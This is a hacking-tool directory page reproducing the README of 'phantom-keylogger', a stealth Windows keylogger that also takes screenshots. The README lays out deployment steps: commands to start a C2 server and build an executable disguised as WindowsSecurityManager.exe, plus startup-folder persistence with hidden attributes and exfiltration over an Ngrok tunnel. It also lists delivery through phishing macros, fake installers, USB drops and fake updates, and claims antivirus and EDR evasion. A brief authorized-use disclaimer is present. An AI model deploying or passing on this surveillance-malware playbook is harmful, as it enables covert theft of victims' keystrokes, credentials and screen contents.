Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
phantom-keylogger — Phantom Keylogger is an advanced, stealth-enabled keystroke and visual intelligence gathering system. | Kitploit
Tools/GitHubGitHub/mattiaalessi/phantom-keylogger
Phishing ToolsPayload GenerationPersistence MechanismsIDS/IPS EvasionLateral MovementData ExfiltrationCommand and ControlSocial EngineeringRed Teaming
GitHubmattiaalessi/phantom-keylogger

phantom-keylogger

Phantom Keylogger is an advanced, stealth-enabled keystroke and visual intelligence gathering system.

77148 months agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

Phantom Keylogger

Red Team Stealth Version

🎯 MISSION BRIEF

Phantom Keylogger is an advanced, stealth-enabled keystroke and visual intelligence gathering system. Built with operational security as the primary objective, this tool provides persistent surveillance capabilities while maintaining minimal footprint on target systems during authorized red team engagements.

⚠️ OPERATIONAL PROTOCOLS

AUTHORIZED USE CASES:
- Authorized penetration testing operations
- Red team exercises with written Rules of Engagement
- Security research in controlled environments
- Defensive security control validation

PROHIBITED OPERATIONS:
- Unauthorized surveillance activities
- Illegal intrusion or data exfiltration
- Personal privacy violation
- Any non-authorized offensive operations

OPERATORS ASSUME FULL LEGAL RESPONSIBILITY FOR PROPER DEPLOYMENT

🛡️ OPERATIONAL CAPABILITIES

Intelligence Collection Modules

  • Keystroke Interception: Advanced keyboard capture with special key translation
  • Visual Surveillance: Automated screenshot capture at configurable intervals
  • System Reconnaissance: Hostname, username, and environment data collection
  • Persistent Implant: Continuous monitoring with automatic recovery mechanisms

Operational Security Features

  • Zero UI Footprint: Completely invisible to end users
  • Persistence Mechanisms: Automatic startup installation
  • Anti-Forensics: Mutex-based single instance protection
  • File System Obfuscation: Hidden file attributes and legitimate naming

🚀 OPERATIONAL DEPLOYMENT

Phase 1: Command & Control Infrastructure

root@kitploit:~
# 1. Clone operational repository
git clone https://github.com/MattiaAlessi/phantom-keylogger
cd phantom-keylogger

# 2. Install operational dependencies
pip install -r requirements.txt

# 3. Deploy C2 server
python server.py

Phase 2: Payload Generation

root@kitploit:~
# Generate stealth executable
python build.py

Output: dist/WindowsSecurityManager.exe

Phase 3: Target Deployment

Delivery Methods:

  • Phishing Campaigns: Document macros or fake installers
  • Physical Access: USB drop attacks
  • Lateral Movement: Compromised internal shares
  • Social Engineering: Fake software updates

Phase 4: Visual tool

root@kitploit:~
# Start the GUI interface 
python manager.py

🔧 TECHNICAL SPECIFICATIONS

Architecture Overview

root@kitploit:~
┌─────────────────┐    ┌──────────────────┐    ┌─────────────────┐
│   TARGET        │    │   C2 TUNNEL      │    │   OPERATOR      │
│                 │    │                  │    │                 │
│  ┌─────────────┐│    │  ┌─────────────┐ │    │  ┌─────────────┐│
│  │ Stealth     ││    │  │ Ngrok       │ │    │  │ Management  ││
│  │ Keylogger   ├───────►│ Tunnel      ├───────►│ Console      ││
│  │             ││    │  │             │ │    │  │             ││
│  └─────────────┘│    │  └─────────────┘ │    │  └─────────────┘│
└─────────────────┘    └──────────────────┘    └─────────────────┘

Persistence Mechanisms

Startup Folder: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
Easily accessible by digiting shell:startup in the dialog box (WIN+r) File Name: WindowsSecurityManager.exe
Attributes: Hidden system file

🛡️ DEFENSE EVASION TECHNIQUES

AV/EDR Bypass Methods

  • Legitimate Naming: Uses Windows security-related names
  • Behavioral Obfuscation: Normal system process patterns
  • Network Blending: HTTPS traffic to legitimate-looking domains
  • Memory Operations: No suspicious API calls or injection

Operational Security Measures

  • No Local Artifacts: All data transmitted remotely via encrypted channels
  • Standard Tooling: Utilizes only common, whitelisted Python libraries
  • Clean Exit Procedures: No crash dumps or forensic artifacts left behind

📊 OPERATIONAL METRICS

  • Detection Evasion: Successfully tested against multiple security solutions with multiple Antivirus installed
  • Data Exfiltration: Encrypted, real-time transmission to C2
  • Operational Uptime: Continuous monitoring with auto-recovery
Download Tool